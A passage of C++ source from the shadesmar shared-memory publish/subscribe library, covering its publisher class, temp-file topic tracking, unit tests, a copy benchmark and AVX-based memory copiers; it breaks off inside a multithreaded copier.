/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_PUBSUB_PUBLISHER_H_
#define INCLUDE_SHADESMAR_PUBSUB_PUBLISHER_H_
#include <cstdint>
#include <cstring>
#include <iostream>
#include <memory>
#include <string>
#include <utility>
#include "shadesmar/memory/copier.h"
#include "shadesmar/pubsub/topic.h"
namespace shm::pubsub {
class Publisher {
public:
explicit Publisher(const std::string &topic_name);
Publisher(const std::string &topic_name,
std::shared_ptr<memory::Copier> copier);
Publisher(const Publisher &) = delete;
Publisher(Publisher &&);
bool publish(void *data, size_t size);
private:
std::string topic_name_;
std::unique_ptr<Topic> topic_;
};
Publisher::Publisher(const std::string &topic_name) : topic_name_(topic_name) {
topic_ = std::make_unique<Topic>(topic_name);
}
Publisher::Publisher(const std::string &topic_name,
std::shared_ptr<memory::Copier> copier)
: topic_name_(topic_name) {
topic_ = std::make_unique<Topic>(topic_name, copier);
}
Publisher::Publisher(Publisher &&other) {
topic_name_ = other.topic_name_;
topic_ = std::move(other.topic_);
}
bool Publisher::publish(void *data, size_t size) {
memory::Memblock memblock(data, size);
return topic_->write(memblock);
}
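// Usage sketch (illustrative only; the topic name and payload are
// hypothetical):
//
//   shm::pubsub::Publisher pub("example_topic");
//   int value = 42;
//   pub.publish(&value, sizeof(value));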
} // namespace shm::pubsub
#endif // INCLUDE_SHADESMAR_PUBSUB_PUBLISHER_H_
<|start_filename|>include/shadesmar/memory/tmp.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_MEMORY_TMP_H_
#define INCLUDE_SHADESMAR_MEMORY_TMP_H_
#include <sys/stat.h>
#include <algorithm>
#include <fstream>
#include <iterator>
#include <random>
#include <string>
#include <vector>
#include "shadesmar/memory/filesystem.h"
namespace shm::memory::tmp {
char const default_chars[] =
"abcdefghijklmnaoqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
char const tmp_prefix[] = "/tmp/shm/";
inline std::string random_string(size_t len = 15) {
std::mt19937_64 gen{std::random_device()()};
// The distribution's bounds are inclusive; subtract 2 so the trailing '\0' of
// default_chars is never picked.
std::uniform_int_distribution<size_t> dist{0, sizeof(default_chars) - 2};
std::string ret;
std::generate_n(std::back_inserter(ret), len,
[&] { return default_chars[dist(gen)]; });
return ret;
}
inline bool file_exists(const std::string &file_name) {
// POSIX only
struct stat buffer {};
return (stat(file_name.c_str(), &buffer) == 0);
}
inline void write(const std::string &name) {
if (!file_exists(tmp_prefix)) {
std::filesystem::create_directories(tmp_prefix);
}
std::fstream file;
std::string file_name = tmp_prefix + random_string();
file.open(file_name, std::ios::out);
file << name.c_str() << std::endl;
file.close();
}
inline std::vector<std::string> get_tmp_names() {
std::vector<std::string> names{};
if (!file_exists(tmp_prefix)) {
return names;
}
for (const auto &entry : std::filesystem::directory_iterator(tmp_prefix)) {
std::fstream file;
file.open(entry.path().generic_string(), std::ios::in);
std::string name;
file >> name;
names.push_back(name);
}
return names;
}
inline bool exists(const std::string &name) {
auto existing_names = get_tmp_names();
for (auto &existing_name : existing_names) {
if (existing_name == name) {
return true;
}
}
return false;
}
inline void delete_topics() { std::filesystem::remove_all(tmp_prefix); }
} // namespace shm::memory::tmp
#endif // INCLUDE_SHADESMAR_MEMORY_TMP_H_
<|start_filename|>include/shadesmar/memory/filesystem.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_MEMORY_FILESYSTEM_H_
#define INCLUDE_SHADESMAR_MEMORY_FILESYSTEM_H_
// Check for feature test macro for <filesystem>
#if defined(__cpp_lib_filesystem)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 0
// Check for feature test macro for <experimental/filesystem>
#elif defined(__cpp_lib_experimental_filesystem)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 1
// Check if the header "<filesystem>" exists
#elif __has_include(<filesystem>)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 0
// Check if the header "<experimental/filesystem>" exists
#elif __has_include(<experimental/filesystem>)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 1
// Fail if neither header is available with a nice error message
#else
#error Could not find system header "<filesystem>"
#endif // defined(__cpp_lib_filesystem)
// We previously determined that we need the experimental version
#if INCLUDE_STD_FILESYSTEM_EXPERIMENTAL
// Include it
#include <experimental/filesystem>
// We need the alias from std::experimental::filesystem to std::filesystem
namespace std {
namespace filesystem = experimental::filesystem;
}
// We have a decent compiler and can use the normal version
#else
// Include it
#include <filesystem>
#endif // INCLUDE_STD_FILESYSTEM_EXPERIMENTAL
#endif // INCLUDE_SHADESMAR_MEMORY_FILESYSTEM_H_
<|start_filename|>test/pubsub_test.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include <iostream>
#include <mutex>
#include <thread>
#include <vector>
#ifdef SINGLE_HEADER
#include "shadesmar.h"
#else
#include "shadesmar/pubsub/publisher.h"
#include "shadesmar/pubsub/subscriber.h"
#endif
#define CATCH_CONFIG_MAIN
#include "catch.hpp"
TEST_CASE("single_message") {
std::string topic = "single_message";
int message = 3;
shm::pubsub::Publisher pub(topic);
int answer;
auto callback = [&answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
};
shm::pubsub::Subscriber sub(topic, callback);
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
sub.spin_once();
REQUIRE(answer == message);
}
TEST_CASE("multiple_messages") {
std::string topic = "multiple_messages";
std::vector<int> messages = {1, 2, 3, 4, 5};
shm::pubsub::Publisher pub(topic);
std::vector<int> answers;
auto callback = [&answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
for (int i = 0; i < messages.size(); ++i) {
sub.spin_once();
}
REQUIRE(answers == messages);
}
TEST_CASE("alternating_pub_sub") {
std::string topic = "alternating_pub_sub";
int message = 3;
shm::pubsub::Publisher pub(topic);
int answer;
auto callback = [&answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
};
shm::pubsub::Subscriber sub(topic, callback);
for (int i = 0; i < 10; i++) {
pub.publish(reinterpret_cast<void *>(&i), sizeof(int));
sub.spin_once();
REQUIRE(answer == i);
}
}
TEST_CASE("single_pub_multiple_sub") {
std::string topic = "single_pub_multiple_sub";
std::vector<int> messages = {1, 2, 3, 4, 5};
shm::pubsub::Publisher pub(topic);
int n_subs = 3;
std::vector<std::vector<int>> vec_answers;
for (int i = 0; i < n_subs; ++i) {
std::vector<int> answers;
vec_answers.push_back(answers);
}
std::vector<shm::pubsub::Subscriber> subs;
for (int i = 0; i < n_subs; i++) {
auto callback = [idx = i, &vec_answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
vec_answers[idx].push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
subs.push_back(std::move(sub));
}
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
SECTION("messages by subscribers") {
for (int i = 0; i < messages.size(); ++i) {
std::cout << "Subscribe message: " << i << std::endl;
for (int s = 0; s < n_subs; ++s) {
std::cout << "Subscriber: " << s << std::endl;
subs[s].spin_once();
}
}
}
SECTION("subscribers by messages") {
for (int s = 0; s < n_subs; ++s) {
std::cout << "Subscriber: " << s << std::endl;
for (int i = 0; i < messages.size(); ++i) {
std::cout << "Subscribe message: " << i << std::endl;
subs[s].spin_once();
}
}
}
for (int i = 0; i < n_subs; ++i) {
REQUIRE(vec_answers[i] == messages);
}
}
TEST_CASE("multiple_pub_single_sub") {
std::string topic = "multiple_pub_single_sub";
int n_pubs = 3;
int n_messages = 5;
std::vector<shm::pubsub::Publisher> pubs;
for (int i = 0; i < n_pubs; ++i) {
shm::pubsub::Publisher pub(topic);
pubs.push_back(std::move(pub));
}
std::vector<int> answers;
auto callback = [&answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
SECTION("messages by publishers") {
int msg = 1;
for (int m = 0; m < n_messages; ++m) {
for (int p = 0; p < n_pubs; ++p) {
pubs[p].publish(reinterpret_cast<void *>(&msg), sizeof(int));
msg++;
}
}
}
SECTION("publishers by messages") {
int msg = 1;
for (int p = 0; p < n_pubs; ++p) {
for (int m = 0; m < n_messages; ++m) {
pubs[p].publish(reinterpret_cast<void *>(&msg), sizeof(int));
msg++;
}
}
}
shm::pubsub::Subscriber sub(topic, callback);
std::vector<int> expected;
for (int i = 0; i < n_messages * n_pubs; ++i) {
sub.spin_once();
expected.push_back(i + 1);
}
REQUIRE(expected == answers);
}
TEST_CASE("multiple_pub_multiple_sub") {
std::string topic = "multiple_pub_multiple_sub";
int n_pubs = 3, n_subs = 3, n_messages = 5;
REQUIRE(n_pubs == n_subs);
std::vector<shm::pubsub::Publisher> pubs;
for (int i = 0; i < n_pubs; ++i) {
shm::pubsub::Publisher pub(topic);
pubs.push_back(std::move(pub));
}
std::vector<int> messages;
int msg = 1;
for (int p = 0; p < n_pubs; ++p) {
for (int m = 0; m < n_messages; ++m) {
messages.push_back(msg);
pubs[p].publish(reinterpret_cast<void *>(&msg), sizeof(int));
msg++;
}
}
std::vector<std::vector<int>> vec_answers;
for (int i = 0; i < n_subs; ++i) {
std::vector<int> answers;
vec_answers.push_back(answers);
}
std::vector<shm::pubsub::Subscriber> subs;
for (int i = 0; i < n_subs; i++) {
auto callback = [idx = i, &vec_answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
vec_answers[idx].push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
subs.push_back(std::move(sub));
}
for (int s = 0; s < n_subs; ++s) {
for (int i = 0; i < messages.size(); ++i) {
subs[s].spin_once();
}
}
for (int i = 0; i < n_subs; ++i) {
REQUIRE(vec_answers[i] == messages);
}
}
TEST_CASE("spin_without_new_msg") {
std::string topic = "spin_without_new_msg";
int message = 3;
shm::pubsub::Publisher pub(topic);
int count = 0, answer;
auto callback = [&count, &answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
++count;
};
shm::pubsub::Subscriber sub(topic, callback);
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
sub.spin_once();
REQUIRE(answer == 3);
REQUIRE(count == 1);
++message;
sub.spin_once();
REQUIRE(count == 1);
++message;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
sub.spin_once();
REQUIRE(answer == 5);
REQUIRE(count == 2);
}
TEST_CASE("sub_counter_jump") {
std::string topic = "sub_counter_jump";
shm::pubsub::Publisher pub(topic);
int answer;
auto callback = [&answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
};
shm::pubsub::Subscriber sub(topic, callback);
for (int i = 0; i < shm::memory::QUEUE_SIZE; ++i) {
pub.publish(reinterpret_cast<void *>(&i), sizeof(int));
}
sub.spin_once();
int lookback =
shm::pubsub::jumpahead(shm::memory::QUEUE_SIZE, shm::memory::QUEUE_SIZE);
REQUIRE(answer == lookback);
int moveahead = shm::memory::QUEUE_SIZE - lookback + 1;
for (int i = 0; i < moveahead; ++i) {
int message = lookback + i;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
sub.spin_once();
REQUIRE(answer == moveahead);
}
TEST_CASE("sub_after_pub_dtor") {
std::string topic = "sub_after_pub_dtor";
std::vector<int> messages = {1, 2, 3, 4, 5};
std::vector<int> answers;
{
shm::pubsub::Publisher pub(topic);
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
}
{
auto callback = [&answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
for (int i = 0; i < messages.size(); ++i) {
sub.spin_once();
}
}
REQUIRE(answers == messages);
}
TEST_CASE("spin_on_thread") {
std::string topic = "spin_on_thread";
std::vector<int> messages = {1, 2, 3, 4, 5};
std::vector<int> answers;
std::mutex mu;
auto callback = [&answers, &mu](shm::memory::Memblock *memblock) {
std::unique_lock<std::mutex> lock(mu);
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
shm::pubsub::Publisher pub(topic);
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
shm::pubsub::Subscriber sub(topic, callback);
std::thread th([&]() { sub.spin(); });
while (true) {
std::unique_lock<std::mutex> lock(mu);
if (answers.size() == messages.size()) {
break;
}
}
sub.stop();
th.join();
REQUIRE(answers == messages);
}
// TODO(squadricK): Add tests
// - All the multiple pub/sub tests with parallelism
<|start_filename|>benchmark/dragons.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include "shadesmar/memory/dragons.h"
#include <benchmark/benchmark.h>
#include <cstring>
#define STARTRANGE 1 << 5 // 32 bytes
#define ENDRANGE 1 << 23 // 8 MB
#define SHMRANGE STARTRANGE, ENDRANGE
template <class CopierT>
void CopyBench(benchmark::State &state) { // NOLINT
CopierT cpy;
size_t size = state.range(0);
auto *src = cpy.alloc(size);
auto *dst = cpy.alloc(size);
std::memset(src, 'x', size);
for (auto _ : state) {
cpy.shm_to_user(dst, src, size);
benchmark::DoNotOptimize(dst);
}
cpy.dealloc(src);
cpy.dealloc(dst);
state.SetBytesProcessed(size * static_cast<int64_t>(state.iterations()));
}
#define SHM_COPY_BENCHMARK(c) \
BENCHMARK_TEMPLATE(CopyBench, c)->Range(SHMRANGE);
SHM_COPY_BENCHMARK(shm::memory::DefaultCopier);
#ifdef __x86_64__
SHM_COPY_BENCHMARK(shm::memory::dragons::RepMovsbCopier);
#endif
#ifdef __AVX__
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxUnrollCopier);
#endif
#ifdef __AVX2__
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncPFCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncUnrollCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncPFUnrollCopier);
#endif
BENCHMARK_MAIN();
<|start_filename|>include/shadesmar/memory/dragons.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
// HERE BE DRAGONS
#ifndef INCLUDE_SHADESMAR_MEMORY_DRAGONS_H_
#define INCLUDE_SHADESMAR_MEMORY_DRAGONS_H_
#include <immintrin.h>
#include <cstdlib>
#include <thread>
#include <vector>
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/memory.h"
namespace shm::memory::dragons {
//------------------------------------------------------------------------------
#ifdef __x86_64__
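// Copies n bytes from s to d with the x86 "rep movsb" string instruction;
// on CPUs with enhanced rep movsb (ERMSB) this can be competitive with
// vectorized copies for large buffers.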
static inline void _rep_movsb(void *d, const void *s, size_t n) {
asm volatile("rep movsb"
: "=D"(d), "=S"(s), "=c"(n)
: "0"(d), "1"(s), "2"(n)
: "memory");
}
class RepMovsbCopier : public Copier {
public:
using PtrT = uint8_t;
void *alloc(size_t size) override { return malloc(size); }
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_rep_movsb(dst, src, size);
}
void user_to_shm(void *dst, void *src, size_t size) override {
_rep_movsb(dst, src, size);
}
};
#endif // __x86_64__
//------------------------------------------------------------------------------
#ifdef __AVX__
static inline void _avx_cpy(void *d, const void *s, size_t n) {
// d, s -> 32 byte aligned
// n -> multiple of 32
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec--, sVec++, dVec++) {
const __m256i temp = _mm256_load_si256(sVec);
_mm256_store_si256(dVec, temp);
}
}
class AvxCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_cpy(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_cpy(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX__
//------------------------------------------------------------------------------
#ifdef __AVX2__
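// Same as _avx_cpy, but uses non-temporal (streaming) loads and stores so the
// copied data bypasses the cache; the trailing sfence orders the streaming
// stores before the copy is considered complete.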
static inline void _avx_async_cpy(void *d, const void *s, size_t n) {
// d, s -> 32 byte aligned
// n -> multiple of 32
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec--, sVec++, dVec++) {
const __m256i temp = _mm256_stream_load_si256(sVec);
_mm256_stream_si256(dVec, temp);
}
_mm_sfence();
}
class AvxAsyncCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_cpy(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_cpy(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_pf_cpy(void *d, const void *s, size_t n) {
// d, s -> 64 byte aligned
// n -> multiple of 64
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 2; nVec -= 2, sVec += 2, dVec += 2) {
// prefetch the next iteration's data
// by default _mm_prefetch moves the entire cache-line (64b)
_mm_prefetch(sVec + 2, _MM_HINT_T0);
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
}
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm_sfence();
}
class AvxAsyncPFCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = sizeof(__m256i) * 2;
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
#ifdef __AVX__
static inline void _avx_cpy_unroll(void *d, const void *s, size_t n) {
// d, s -> 128 byte aligned
// n -> multiple of 128
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec -= 4, sVec += 4, dVec += 4) {
_mm256_store_si256(dVec, _mm256_load_si256(sVec));
_mm256_store_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm256_store_si256(dVec + 2, _mm256_load_si256(sVec + 2));
_mm256_store_si256(dVec + 3, _mm256_load_si256(sVec + 3));
}
}
class AvxUnrollCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = 4 * sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_cpy_unroll(void *d, const void *s, size_t n) {
// d, s -> 128 byte aligned
// n -> multiple of 128
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec -= 4, sVec += 4, dVec += 4) {
_mm256_stream_si256(dVec, _mm256_stream_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_stream_load_si256(sVec + 1));
_mm256_stream_si256(dVec + 2, _mm256_stream_load_si256(sVec + 2));
_mm256_stream_si256(dVec + 3, _mm256_stream_load_si256(sVec + 3));
}
_mm_sfence();
}
class AvxAsyncUnrollCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = 4 * sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_pf_cpy_unroll(void *d, const void *s, size_t n) {
// d, s -> 128 byte aligned
// n -> multiple of 128
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 4; nVec -= 4, sVec += 4, dVec += 4) {
// prefetch data for next iteration
_mm_prefetch(sVec + 4, _MM_HINT_T0);
_mm_prefetch(sVec + 6, _MM_HINT_T0);
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm256_stream_si256(dVec + 2, _mm256_load_si256(sVec + 2));
_mm256_stream_si256(dVec + 3, _mm256_load_si256(sVec + 3));
}
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm256_stream_si256(dVec + 2, _mm256_load_si256(sVec + 2));
_mm256_stream_si256(dVec + 3, _mm256_load_si256(sVec + 3));
_mm_sfence();
}
class AvxAsyncPFUnrollCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = 4 * sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
template <class BaseCopierT, uint32_t nthreads>
class MTCopier : public Copier {
public:
MTCopier() : base_copier() {}
void *alloc(size_t size) override { return base_copier.alloc(size); }
void dealloc(void *ptr) override { base_copier.dealloc(ptr); }
void _copy(void *d, void *s, size_t n, bool shm_to_user) {
n = SHMALIGN(n, sizeof(typename BaseCopierT::PtrT)) /
sizeof(typename BaseCopierT::PtrT);
std::vector<std::thread> threads;
threads.reserve(nthreads);
auto per_worker = div((int64_t)n, nthreads);
size_t next_start = 0;
for (uint32_t thread_idx = 0; thread_idx < nthreads; ++thread_idx) {
const size_t curr_start = next_start;
next_start += per_worker.quot;
